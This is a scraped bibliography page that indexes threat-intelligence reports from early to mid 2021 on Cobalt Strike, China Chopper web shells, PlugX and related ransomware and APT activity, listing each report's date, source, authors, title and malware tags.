Catalin CimpanuMongolian certificate authority hacked eight times, compromised with malware Cobalt Strike
×Select Content2021-07-01
⋅
Avast Decoded
⋅
Igor Morgenstern,
Jan Vojtěšek,
Luigino CamastraBackdoored Client from Mongolian CA MonPass Cobalt Strike
Earth Lusca
×Select Content2021-07-01
⋅
Avast Decoded
⋅
Igor Morgenstern,
Jan Vojtěšek,
Luigino CamastraBackdoored Client from Mongolian CA MonPass Cobalt Strike
FishMaster
×Select Content2021-06-30
⋅
Group-IB
⋅
Oleg SkulkinREvil Twins Deep Dive into Prolific RaaS Affiliates' TTPs Cobalt Strike
REvil
×Select Content2021-06-29
⋅
Accenture
⋅
Accenture SecurityHADES ransomware operators continue attacks Cobalt Strike
Hades
MimiKatz
×Select Content2021-06-29
⋅
Proofpoint
⋅
Daniel Blackford,
Selena LarsonCobalt Strike: Favorite Tool from APT to Crimeware Cobalt Strike
×Select Content2021-06-28
⋅
The DFIR Report
⋅
The DFIR ReportHancitor Continues to Push Cobalt Strike Cobalt Strike
Hancitor
×Select Content2021-06-22
⋅
CrowdStrike
⋅
The Falcon Complete TeamResponse When Minutes Matter: Falcon Complete Disrupts WIZARD SPIDER eCrime Operators Cobalt Strike
×Select Content2021-06-22
⋅
Twitter (@Cryptolaemus1)
⋅
Cryptolaemus,
dao ming si,
Kirk SayreTweet on TA575, a Dridex affiliate delivering cobaltstrike (packed withe Cryptone) directly via the macro docs Cobalt Strike
Dridex
×Select Content2021-06-20
⋅
The DFIR Report
⋅
The DFIR ReportFrom Word to Lateral Movement in 1 Hour Cobalt Strike
IcedID
×Select Content2021-06-18
⋅
SecurityScorecard
⋅
Ryan SherstobitoffSecurityScorecard Finds USAID Hack Much Larger Than Initially Thought Cobalt Strike
×Select Content2021-06-17
⋅
Binary Defense
⋅
Brandon GeorgeAnalysis of Hancitor – When Boring Begets Beacon Cobalt Strike
Ficker Stealer
Hancitor
×Select Content2021-06-16
⋅
Mandiant
⋅
Jared Wilson,
Jordan Nuce,
Justin Moore,
Mike Hunhoff,
Nick Harbour,
Robert Dean,
Tyler McLellanSmoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise Cobalt Strike
SMOKEDHAM
×Select Content2021-06-16
⋅
Recorded Future
⋅
Insikt Group®Threat Activity Group RedFoxtrot Linked to China’s PLA Unit 69010; Targets Bordering Asian Countries Icefog
PcShare
PlugX
Poison Ivy
QuickHeal
DAGGER PANDA
×Select Content2021-06-16
⋅
⋅
Національної поліції України
⋅
Національна поліція УкраїниCyberpolice exposes hacker group in spreading encryption virus and causing half a billion dollars in damage to foreign companies Clop
Cobalt Strike
FlawedAmmyy
×Select Content2021-06-16
⋅
FireEye
⋅
Jared Wilson,
Justin Moore,
Mike Hunhoff,
Nick Harbour,
Robert Dean,
Tyler McLellanSmoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise Cobalt Strike
SMOKEDHAM
×Select Content2021-06-15
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamHades Ransomware Operators Use Distinctive Tactics and Infrastructure Cobalt Strike
Hades
×Select Content2021-06-12
⋅
Twitter (@AltShiftPrtScn)
⋅
Peter MackenzieA thread on RagnarLocker ransomware group's TTP seen in an Incident Response Cobalt Strike
RagnarLocker
×Select Content2021-06-10
⋅
Group-IB
⋅
Nikita RostovcevBig airline heist APT41 likely behind massive supply chain attack Cobalt Strike
×Select Content2021-06-10
⋅
ESET Research
⋅
Adam BurgherBackdoorDiplomacy: Upgrading from Quarian to Turian CHINACHOPPER
DoublePulsar
EternalRocks
turian
BackdoorDiplomacy
×Select Content2021-06-09
⋅
Twitter (@RedDrip7)
⋅
RedDrip7Tweet on in the wild exploit of CVE-2021-26868 (according to @_clem1) Cobalt Strike
×Select Content2021-06-04
⋅
Twitter (@alex_lanstein)
⋅
Alex LansteinTweet on UNC2652/NOBELIUM targeting IOS users exploiting CVE-2021-1879 Cobalt Strike
×Select Content2021-06-04
⋅
Inky
⋅
Roger KayColonial Pipeline Ransomware Hack Unleashes Flood of Related Phishing Attempts Cobalt Strike
×Select Content2021-06-02
⋅
Sophos
⋅
Sean GallagherAMSI bypasses remain tricks of the malware trade Agent Tesla
Cobalt Strike
Meterpreter
×Select Content2021-06-02
⋅
Medium CyCraft
⋅
CyCraft Technology CorpChina-Linked Threat Group Targets Taiwan Critical Infrastructure, Smokescreen Ransomware Cobalt Strike
ColdLock
×Select Content2021-06-02
⋅
Twitter (@xorhex)
⋅
XorhexTweet on new variant of PlugX from RedDelta Group PlugX
×Select Content2021-06-02
⋅
xorhex blog
⋅
Twitter (@xorhex)RedDelta PlugX Undergoing Changes and Overlapping Again with Mustang Panda PlugX Infrastructure PlugX
×Select Content2021-06-01
⋅
Department of Justice
⋅
Office of Public AffairsJustice Department Announces Court-Authorized Seizure of Domain Names Used in Furtherance of Spear-Phishing Campaign Posing as U.S. Agency for International Development Cobalt Strike
×Select Content2021-06-01
⋅
SentinelOne
⋅
Juan Andrés Guerrero-SaadeNobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks Cobalt Strike
×Select Content2021-06-01
⋅
SANS
⋅
Jake Williams,
Kevin HaleyA Contrarian View on SolarWinds Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-06-01
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft Threat Intelligence Center (MSTIC)New sophisticated email-based attack from NOBELIUM Cobalt Strike
×Select Content2021-05-29
⋅
Twitter (@elisalem9)
⋅
Eli SalemTweet on obfuscation mechanism and extraction procedure of COBALTSTRIKE beacon module used by NOBELIUM/UNC2452 Cobalt Strike
×Select Content2021-05-28
⋅
CISA
⋅
US-CERTMalware Analysis Report (AR21-148A): Cobalt Strike Beacon Cobalt Strike
×Select Content2021-05-28
⋅
CISA
⋅
US-CERTAlert (AA21-148A): Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs Cobalt Strike
×Select Content2021-05-28
⋅
Microsoft
⋅
Microsoft Threat Intelligence Center (MSTIC)Breaking down NOBELIUM’s latest early-stage toolset BOOMBOX
Cobalt Strike
×Select Content2021-05-27
⋅
Volexity
⋅
Damien Cash,
Josh Grunzweig,
Matthew Meltzer,
Sean Koessel,
Steven Adair,
Thomas LancasterSuspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns Cobalt Strike
×Select Content2021-05-27
⋅
xorhex blog
⋅
Twitter (@xorhex)Mustang Panda PlugX - Reused Mutex and Folder Found in the Extracted Config PlugX
×Select Content2021-05-26
⋅
DeepInstinct
⋅
Ron Ben YizhakA Deep Dive into Packing Software CryptOne Cobalt Strike
Dridex
Emotet
Gozi
ISFB
Mailto
QakBot
SmokeLoader
WastedLocker
Zloader
×Select Content2021-05-25
⋅
Huntress Labs
⋅
Matthew BrennanCobalt Strikes Again: An Analysis of Obfuscated Malware Cobalt Strike
×Select Content2021-05-21
⋅
blackarrow
⋅
Pablo AmbiteLeveraging Microsoft Teams to persist and cover up Cobalt Strike traffic Cobalt Strike
×Select Content2021-05-19
⋅
Intel 471
⋅
Intel 471Look how many cybercriminals love Cobalt Strike BazarBackdoor
Cobalt Strike
Hancitor
QakBot
SmokeLoader
SystemBC
TrickBot
×Select Content2021-05-19
⋅
Medium Mehmet Ergene
⋅
Mehmet ErgeneEnterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 2 Cobalt Strike
×Select Content2021-05-18
⋅
Sophos
⋅
Greg Iddon,
John Shier,
Mat Gangwer,
Peter MackenzieThe Active Adversary Playbook 2021 Cobalt Strike
MimiKatz
×Select Content2021-05-17
⋅
Talos
⋅
Brad GarnettCase Study: Incident Response is a relationship-driven business Cobalt Strike
×Select Content2021-05-17
⋅
xorhex blog
⋅
Twitter (@xorhex)Mustang Panda PlugX - 45.251.240.55 Pivot PlugX
×Select Content2021-05-16
⋅
NCSC Ireland
⋅
NCSC IrelandRansomware Attack on Health Sector - UPDATE 2021-05-16 Cobalt Strike
Conti
×Select Content2021-05-14
⋅
GuidePoint Security
⋅
Drew SchmittFrom ZLoader to DarkSide: A Ransomware Story DarkSide
Cobalt Strike
Zloader
×Select Content2021-05-14
⋅
Blue Team Blog
⋅
Auth 0rDarkSide Ransomware Operations – Preventions and Detections. Cobalt Strike
DarkSide
×Select Content2021-05-13
⋅
AWAKE
⋅
Kieran EvansCatching the White Stork in Flight Cobalt Strike
MimiKatz
RMS
×Select Content2021-05-12
⋅
Medium Mehmet Ergene
⋅
Mehmet ErgeneEnterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 1 Cobalt Strike
×Select Content2021-05-12
⋅
The DFIR ReportConti Ransomware Cobalt Strike
Conti
IcedID
×Select Content2021-05-11
⋅
Mal-Eats
⋅
mal_eatsCampo, a New Attack Campaign Targeting Japan AnchorDNS
BazarBackdoor
campoloader
Cobalt Strike
Phobos
Snifula
TrickBot
Zloader
×Select Content2021-05-11
⋅
FireEye
⋅
Alyssa Rahman,
Andrew Moore,
Brendan McKeague,
Jared Wilson,
Jeremy Kennelly,
Jordan Nuce,
Kimberly GoodyShining a Light on DARKSIDE Ransomware Operations Cobalt Strike
DarkSide
×Select Content2021-05-10
⋅
Mal-Eats
⋅
mal_eatsOverview of Campo, a new attack campaign targeting Japan AnchorDNS
BazarBackdoor
Cobalt Strike
ISFB
Phobos
TrickBot
Zloader
×Select Content2021-05-10
⋅
ZERO.BS
⋅
ZEROBSCobaltstrike-Beacons analyzed Cobalt Strike
×Select Content2021-05-07
⋅
Cisco Talos
⋅
Andrew Windsor,
Caitlin Huey,
Edmund BrumaghinLemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs CHINACHOPPER
Cobalt Strike
Lemon Duck
×Select Content2021-05-07
⋅
Medium svch0st
⋅
svch0stStats from Hunting Cobalt Strike Beacons Cobalt Strike
×Select Content2021-05-07
⋅
TEAMT5
⋅
Aragorn Tseng,
Charles LiMem2Img: Memory-Resident Malware Detection via Convolution Neural Network Cobalt Strike
PlugX
Waterbear
×Select Content2021-05-07
⋅
SophosLabs Uncut
⋅
Rajesh NatarajNew Lemon Duck variants exploiting Microsoft Exchange Server CHINACHOPPER
Cobalt Strike
Lemon Duck
×Select Content2021-05-06
⋅
Trend Micro
⋅
Arianne Dela Cruz,
Cris Tomboc,
Jayson Chong,
Nikki Madayag,
Sean TorreProxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party BlackKingdom Ransomware
CHINACHOPPER
Lemon Duck
Prometei
×Select Content2021-05-05
⋅
TRUESEC
⋅
Mattias WåhlénAre The Notorious Cyber Criminals Evil Corp actually Russian Spies? Cobalt Strike
Hades
WastedLocker
×Select Content2021-05-05
⋅
Symantec
⋅
Threat Hunter TeamMulti-Factor Authentication: Headache for Cyber Actors Inspires New Attack Techniques CHINACHOPPER
×Select Content2021-05-05
⋅
SophosLabs Uncut
⋅
Andrew Brandt,
Gabor Szappanos,
Peter Mackenzie,
Vikas SinghIntervention halts a ProxyLogon-enabled attack Cobalt Strike
×Select Content2021-05-04
⋅
Medium sergiusechel
⋅
Sergiu SechelImproving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the risk of false positives Cobalt Strike
×Select Content2021-05-02
⋅
The DFIR Report
⋅
The DFIR ReportTrickbot Brief: Creds and Beacons Cobalt Strike
TrickBot
×Select Content2021-04-29
⋅
FireEye
⋅
Justin Moore,
Raymond Leong,
Tyler McLellanUNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat Cobalt Strike
FiveHands
HelloKitty
×Select Content2021-04-29
⋅
NTT
⋅
Threat Detection NTT Ltd.The Operations of Winnti group Cobalt Strike
ShadowPad
Spyder
Winnti
Earth Lusca
×Select Content2021-04-27
⋅
Trend Micro
⋅
Earle Earnshaw,
Janus AgcaoiliLegitimate Tools Weaponized for Ransomware in 2021 Cobalt Strike
MimiKatz
×Select Content2021-04-27
⋅
Trend Micro
⋅
Janus AgcaoiliHello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability CHINACHOPPER
Cobalt Strike
×Select Content2021-04-26
⋅
nviso
⋅
Maxime ThiebautAnatomy of Cobalt Strike’s DLL Stager Cobalt Strike
×Select Content2021-04-26
⋅
getrevue
⋅
Twitter (@80vul)Hunting Cobalt Strike DNS redirectors by using ZoomEye Cobalt Strike
×Select Content2021-04-24
⋅
⋅
Non-offensive security
⋅
Non-offensive security teamDetect Cobalt Strike server through DNS protocol Cobalt Strike
×Select Content2021-04-23
⋅
Twitter (@vikas891)
⋅
Vikas SinghTweet on DOPPEL SPIDER using Intensive/Multiple Injected Cobalt Strike Beacons with varied polling intervals Cobalt Strike
DoppelPaymer
×Select Content2021-04-22
⋅
Twitter (@AltShiftPrtScn)
⋅
Peter MackenzieTwwet On TTPs seen in IR used by DOPPEL SPIDER Cobalt Strike
DoppelPaymer
×Select Content2021-04-21
⋅
SophosLabs Uncut
⋅
Anand Aijan,
Andrew Brandt,
Markel Picado,
Michael Wood,
Sean Gallagher,
Sivagnanam Gn,
Suriya NatarajanNearly half of malware now use TLS to conceal communications Agent Tesla
Cobalt Strike
Dridex
SystemBC
×Select Content2021-04-20
⋅
Medium walmartglobaltech
⋅
Jason ReavesCobaltStrike Stager Utilizing Floating Point Math Cobalt Strike
×Select Content2021-04-19
⋅
Netresec
⋅
Erik HjelmvikAnalysing a malware PCAP with IcedID and Cobalt Strike traffic Cobalt Strike
IcedID
×Select Content2021-04-18
⋅
YouTube (dist67)
⋅
Didier StevensDecoding Cobalt Strike Traffic Cobalt Strike
×Select Content2021-04-16
⋅
Trend Micro
⋅
Nitesh SuranaCould the Microsoft Exchange breach be stopped? CHINACHOPPER
×Select Content2021-04-15
⋅
Palo Alto Networks Unit 42
⋅
Robert FalconeActor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials CHINACHOPPER
×Select Content2021-04-14
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanApril 2021 Forensic Quiz: Answers and Analysis Anchor
BazarBackdoor
Cobalt Strike
×Select Content2021-04-12
⋅
Inde
⋅
Chris CampbellA Different Kind of Zoombomb Cobalt Strike
×Select Content2021-04-09
⋅
F-Secure
⋅
Giulio Ginesi,
Riccardo AncaraniDetecting Exposed Cobalt Strike DNS Redirectors Cobalt Strike
×Select Content2021-04-07
⋅
Medium sixdub
⋅
Justin WarnerUsing Kaitai Struct to Parse Cobalt Strike Beacon Configs Cobalt Strike
×Select Content2021-04-05
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattTrickBot Crews New CobaltStrike Loader Cobalt Strike
TrickBot
×Select Content2021-04-01
⋅
DomainTools
⋅
Joe SlowikCOVID-19 Phishing With a Side of Cobalt Strike Cobalt Strike
×Select Content2021-04-01
⋅
Palo Alto Networks Unit 42
⋅
Brad DuncanHancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool Cobalt Strike
Hancitor
Moskalvzapoe
×Select Content2021-03-31
⋅
Red Canary
⋅
Red Canary2021 Threat Detection Report Shlayer
Andromeda
Cobalt Strike
Dridex
Emotet
IcedID
MimiKatz
QakBot
TrickBot
×Select Content2021-03-30
⋅
GuidePoint Security
⋅
Drew SchmittYet Another Cobalt Strike Stager: GUID Edition Cobalt Strike
×Select Content2021-03-29
⋅
The Record
⋅
Catalin CimpanuRedEcho group parks domains after public exposure PlugX
ShadowPad
RedEcho
×Select Content2021-03-29
⋅
The DFIR Report
⋅
The DFIR ReportSodinokibi (aka REvil) Ransomware Cobalt Strike
IcedID
REvil
×Select Content2021-03-26
⋅
Imperva
⋅
Daniel JohnstonImperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures CHINACHOPPER
×Select Content2021-03-25
⋅
Microsoft
⋅
Tom McElroyWeb Shell Threat Hunting with Azure Sentinel CHINACHOPPER
×Select Content2021-03-25
⋅
Recorded Future
⋅
Insikt Group®Suspected Chinese Group Calypso APT Exploiting Vulnerable Microsoft Exchange Servers Meterpreter
PlugX
×Select Content2021-03-25
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence TeamAnalyzing attacks taking advantage of the Exchange Server vulnerabilities CHINACHOPPER
×Select Content2021-03-21
⋅
Twitter (@CyberRaiju)
⋅
Jai MintonTwitter Thread with analysis of .NET China Chopper CHINACHOPPER
×Select Content2021-03-21
⋅
YouTube (dist67)
⋅
Didier StevensFinding Metasploit & Cobalt Strike URLs Cobalt Strike
×Select Content2021-03-21
⋅
Blackberry
⋅
Blackberry Research2021 Threat Report Bashlite
FritzFrog
IPStorm
Mirai
Tsunami
elf.wellmess
AppleJeus
Dacls
EvilQuest
Manuscrypt
Astaroth
BazarBackdoor
Cerber
Cobalt Strike
Emotet
FinFisher RAT
Kwampirs
MimiKatz
NjRAT
Ryuk
SmokeLoader
TrickBot
×Select Content2021-03-19
⋅
Bundesamt für Sicherheit in der Informationstechnik
⋅
CERT-BundMicrosoft Exchange Schwachstellen Detektion und Reaktion (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) CHINACHOPPER
MimiKatz
×Select Content2021-03-18
⋅
DeepInstinct
⋅
Ben GrossCobalt Strike – Post-Exploitation Attackers Toolkit Cobalt Strike
×Select Content2021-03-18
⋅
PRODAFT Threat Intelligence
⋅
PRODAFTSilverFish GroupThreat Actor Report Cobalt Strike
Dridex
Koadic
×Select Content2021-03-17
⋅
Recorded Future
⋅
Insikt Group®China-linked TA428 Continues to Target Russia and Mongolia IT Companies PlugX
Poison Ivy
TA428
×Select Content2021-03-16
⋅
Elastic
⋅
Joe DesimoneDetecting Cobalt Strike with memory signatures Cobalt Strike
×Select Content2021-03-16
⋅
McAfee
⋅
McAfee ATRTechnical Analysis of Operation Diànxùn Cobalt Strike
×Select Content2021-03-15
⋅
Trustwave
⋅
Joshua DeaconHAFNIUM, China Chopper and ASP.NET Runtime CHINACHOPPER
×Select Content2021-03-11
⋅
Cyborg Security
⋅
Josh CampbellYou Don't Know the HAFNIUM of it... CHINACHOPPER
Cobalt Strike
PowerCat
×Select Content2021-03-11
⋅
Qurium
⋅
QuriumMyanmar – Multi-stage malware attack targets elected lawmakers Cobalt Strike
×Select Content2021-03-11
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Microsoft Exchange Server Attack Timeline CHINACHOPPER
×Select Content2021-03-11
⋅
DEVO
⋅
Fran GomezDetection and Investigation Using Devo: HAFNIUM 0-day Exploits on Microsoft Exchange Service CHINACHOPPER
MimiKatz
×Select Content2021-03-10
⋅
Lemon's InfoSec Ramblings
⋅
Josh LemonMicrosoft Exchange & the HAFNIUM Threat Actor CHINACHOPPER
×Select Content2021-03-10
⋅
PICUS Security
⋅
Süleyman ÖzarslanTactics, Techniques, and Procedures (TTPs) Used by HAFNIUM to Target Microsoft Exchange Servers CHINACHOPPER
×Select Content2021-03-10
⋅
ESET Research
⋅
Mathieu Tartare,
Matthieu Faou,
Thomas DupuyExchange servers under siege from at least 10 APT groups Microcin
MimiKatz
PlugX
Winnti
APT27
APT41
Calypso
Tick
ToddyCat
Tonto Team
Vicious Panda
×Select Content2021-03-10
⋅
DomainTools
⋅
Joe SlowikExamining Exchange Exploitation and its Lessons for Defenders CHINACHOPPER
×Select Content2021-03-10
⋅
Proofpoint
⋅
Dennis Schwarz,
Matthew Mesa,
Proofpoint Threat Research TeamNimzaLoader: TA800’s New Initial Access Malware BazarNimrod
Cobalt Strike
×Select Content2021-03-09
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Remediation Steps for the Microsoft Exchange Server Vulnerabilities CHINACHOPPER
×Select Content2021-03-09
⋅
splunk
⋅
Security Research TeamCloud Federated Credential Abuse & Cobalt Strike: Threat Research February 2021 Cobalt Strike
×Select Content2021-03-09
⋅
Red Canary
⋅
Brian Donohue,
Katie Nickels,
Tony LambertMicrosoft Exchange server exploitation: how to detect, mitigate, and stay calm CHINACHOPPER
×Select Content2021-03-09
⋅
PRAETORIAN
⋅
Anthony Weems,
Dallas Kaman,
Michael WeberReproducing the Microsoft Exchange Proxylogon Exploit Chain CHINACHOPPER
×Select Content2021-03-09
⋅
YouTube (John Hammond)
⋅
John HammondHAFNIUM - Post-Exploitation Analysis from Microsoft Exchange CHINACHOPPER
×Select Content2021-03-08
⋅
Youtube (SANS Digital Forensics and Incident Response)
⋅
Adam Pennington,
Jen Burns,
Katie NickelsSTAR Webcast: Making sense of SolarWinds through the lens of MITRE ATT&CK(R) Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-03-08
⋅
Symantec
⋅
Threat Hunter TeamHow Symantec Stops Microsoft Exchange Server Attacks CHINACHOPPER
MimiKatz
×Select Content2021-03-08
⋅
Palo Alto Networks Unit 42
⋅
Jeff WhiteAnalyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells CHINACHOPPER
×Select Content2021-03-08
⋅
The DFIR Report
⋅
The DFIR ReportBazar Drops the Anchor Anchor
BazarBackdoor
Cobalt Strike
×Select Content2021-03-07
⋅
TRUESEC
⋅
Rasmus GrönlundTracking Microsoft Exchange Zero-Day ProxyLogon and HAFNIUM CHINACHOPPER
×Select Content2021-03-07
⋅
InfoSec Handlers Diary Blog
⋅
Didier StevensPCAPs and Beacons Cobalt Strike
×Select Content2021-03-05
⋅
Wired
⋅
Andy GreenbergChinese Hacking Spree Hit an ‘Astronomical’ Number of Victims CHINACHOPPER
×Select Content2021-03-05
⋅
Huntress Labs
⋅
Huntress LabsOperation Exchange Marauder CHINACHOPPER
×Select Content2021-03-04
⋅
Huntress Labs
⋅
Huntress LabsOperation Exchange Marauder CHINACHOPPER
×Select Content2021-03-04
⋅
FireEye
⋅
Andrew Thompson,
Chris DiGiamo,
Matt Bromiley,
Robert WallaceDetection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities CHINACHOPPER
HAFNIUM
×Select Content2021-03-04
⋅
CrowdStrike
⋅
The Falcon Complete TeamFalcon Complete Stops Microsoft Exchange Server Zero-Day Exploits CHINACHOPPER
HAFNIUM
×Select Content2021-03-03
⋅
Huntress Labs
⋅
John HammondRapid Response: Mass Exploitation of On-Prem Exchange Servers CHINACHOPPER
HAFNIUM
×Select Content2021-03-03
⋅
Huntress Labs
⋅
Huntress LabsMass exploitation of on-prem Exchange servers :( CHINACHOPPER
HAFNIUM
×Select Content2021-03-03
⋅
MITRE
⋅
MITRE ATT&CKHAFNIUM CHINACHOPPER
HAFNIUM
×Select Content2021-03-02
⋅
Twitter (@ESETresearch)
⋅
ESET ResearchTweet on Exchange RCE CHINACHOPPER
HAFNIUM
×Select Content2021-03-02
⋅
Volexity
⋅
Josh Grunzweig,
Matthew Meltzer,
Sean Koessel,
Steven Adair,
Thomas LancasterOperation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities CHINACHOPPER
HAFNIUM
×Select Content2021-03-02
⋅
Rapid7 Labs
⋅
Andrew ChristianRapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day CHINACHOPPER
HAFNIUM
×Select Content2021-03-02
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft 365 Security,
Microsoft Threat Intelligence Center (MSTIC)HAFNIUM targeting Exchange Servers with 0-day exploits CHINACHOPPER
HAFNIUM
×Select Content2021-03-01
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattInvestigation into the state of Nim malware BazarNimrod
Cobalt Strike
×Select Content2021-03-01
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattNimar Loader BazarBackdoor
BazarNimrod
Cobalt Strike
×Select Content2021-02-28
⋅
Recorded Future
⋅
Insikt Group®China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions Icefog
PlugX
ShadowPad
×Select Content2021-02-28
⋅
PWC UK
⋅
PWC UKCyber Threats 2020: A Year in Retrospect elf.wellmess
FlowerPower
PowGoop
8.t Dropper
Agent.BTZ
Agent Tesla
Appleseed
Ave Maria
Bankshot
BazarBackdoor
BLINDINGCAN
Chinoxy
Conti
Cotx RAT
Crimson RAT
DUSTMAN
Emotet
FriedEx
FunnyDream
Hakbit
Mailto
Maze
METALJACK
Nefilim
Oblique RAT
Pay2Key
PlugX
QakBot
REvil
Ryuk
StoneDrill
StrongPity
SUNBURST
SUPERNOVA
TrickBot
TurlaRPC
Turla SilentMoon
WastedLocker
WellMess
Winnti
ZeroCleare
APT10
APT23
APT27
APT31
APT41
BlackTech
BRONZE EDGEWOOD
Inception Framework
MUSTANG PANDA
Red Charon
Red Nue
Sea Turtle
Tonto Team
×Select Content2021-02-28
⋅
Recorded Future
⋅
Insikt Group®China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions PlugX
ShadowPad
RedEcho
×Select Content2021-02-26
⋅
CrowdStrike
⋅
Eric Loui,
Sergei FrankoffHypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact DarkSide
RansomEXX
Griffon
Carbanak
Cobalt Strike
DarkSide
IcedID
MimiKatz
PyXie
RansomEXX
REvil
×Select Content2021-02-25
⋅
FireEye
⋅
Brendan McKeague,
Bryce Abdo,
Van TaSo Unchill: Melting UNC2198 ICEDID to Ransomware Operations MOUSEISLAND
Cobalt Strike
Egregor
IcedID
Maze
SystemBC
×Select Content2021-02-24
⋅
Github (AmnestyTech)
⋅
Amnesty InternationalOverview of Ocean Lotus Samples used to target Vietnamese Human Rights Defenders OceanLotus
Cobalt Strike
KerrDown
×Select Content2021-02-24
⋅
⋅
VMWare Carbon Black
⋅
Takahiro HaruyamaKnock, knock, Neo. - Active C2 Discovery Using Protocol Emulation Cobalt Strike
×Select Content2021-02-23
⋅
CrowdStrike
⋅
CrowdStrike2021 Global Threat Report RansomEXX
Amadey
Anchor
Avaddon
BazarBackdoor
Clop
Cobalt Strike
Conti
Cutwail
DanaBot
DarkSide
DoppelPaymer
Dridex
Egregor
Emotet
Hakbit
IcedID
JSOutProx
KerrDown
LockBit
Mailto
Maze
MedusaLocker
Mespinoza
Mount Locker
NedDnLoader
Nemty
Pay2Key
PlugX
Pushdo
PwndLocker
PyXie
QakBot
Quasar RAT
RagnarLocker
Ragnarok
RansomEXX
REvil
Ryuk
Sekhmet
ShadowPad
SmokeLoader
Snake
SUNBURST
SunCrypt
TEARDROP
TrickBot
WastedLocker
Winnti
Zloader
Evilnum
OUTLAW SPIDER
RIDDLE SPIDER
SOLAR SPIDER
VIKING SPIDER
×Select Content2021-02-11
⋅
Twitter (@TheDFIRReport)
⋅
The DFIR ReportTweet on Hancitor Activity followed by cobaltsrike beacon Cobalt Strike
Hancitor
×Select Content2021-02-09
⋅
Securehat
⋅
SecurehatExtracting the Cobalt Strike Config from a TEARDROP Loader Cobalt Strike
TEARDROP
×Select Content2021-02-09
⋅
Cobalt Strike
⋅
Raphael MudgeLearn Pipe Fitting for all of your Offense Projects Cobalt Strike
×Select Content2021-02-03
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanExcel spreadsheets push SystemBC malware Cobalt Strike
SystemBC
×Select Content2021-02-02
⋅
Twitter (@TheDFIRReport)
⋅
The DFIR ReportTweet on recent dridex post infection activity Cobalt Strike
Dridex
×Select Content2021-02-02
⋅
⋅
CRONUP
⋅
Germán FernándezDe ataque con Malware a incidente de Ransomware Avaddon
BazarBackdoor
Buer
Clop
Cobalt Strike
Conti
DanaBot
Dharma
Dridex
Egregor
Emotet
Empire Downloader
FriedEx
GootKit
IcedID
MegaCortex
Nemty
Phorpiex
PwndLocker
PyXie
QakBot
RansomEXX
REvil
Ryuk
SDBbot
SmokeLoader
TrickBot
Zloader
×Select Content2021-02-02
⋅
Committee to Protect Journalists
⋅
Madeline EarpHow Vietnam-based hacking operation OceanLotus targets journalists Cobalt Strike
×Select Content2021-02-01
⋅
pkb1s.github.io
⋅
Petros KoutroumpisRelay Attacks via Cobalt Strike Beacons Cobalt Strike
×Select Content2021-02-01
⋅
AhnLab
⋅
ASEC Analysis TeamBlueCrab ransomware, CobaltStrike hacking tool installed in corporate environment Cobalt Strike
REvil
×Select Content2021-01-31
⋅
The DFIR Report
⋅
The DFIR ReportBazar, No Ryuk? BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2021-01-29
⋅
Trend Micro
⋅
Trend MicroChopper ASPX web shell used in targeted attack CHINACHOPPER
MimiKatz
×Select Content2021-01-28
⋅
⋅
AhnLab
⋅
ASEC Analysis TeamBlueCrab ransomware constantly trying to bypass detection Cobalt Strike
REvil
×Select Content2021-01-28
⋅
TrustedSec
⋅
Adam ChesterTailoring Cobalt Strike on Target Cobalt Strike
×Select Content2021-01-26
⋅
Twitter (@swisscom_csirt)
⋅
Swisscom CSIRTTweet on Cring Ransomware groups using customized Mimikatz sample followed by CobaltStrike and dropping Cring rasomware Cobalt Strike
Cring
MimiKatz
×Select Content2021-01-20
⋅
Microsoft
⋅
Microsoft 365 Defender Research Team,
Microsoft Cyber Defense Operations Center (CDOC),
Microsoft Threat Intelligence Center (MSTIC)Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-20
⋅
Trend Micro
⋅
Abraham Camba,
Gilbert Sison,
Ryan MaglaqueXDR investigation uncovers PlugX, unique technique in APT attack PlugX
×Select Content2021-01-18
⋅
Symantec
⋅
Threat Hunter TeamRaindrop: New Malware Discovered in SolarWinds Investigation Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-01-17
⋅
Twitter (@AltShiftPrtScn)
⋅
Peter MackenzieTweet on Conti Ransomware group exploiting FortiGate VPNs to drop in CobaltStrike loaders Cobalt Strike
Conti
×Select Content2021-01-15
⋅
Swisscom
⋅
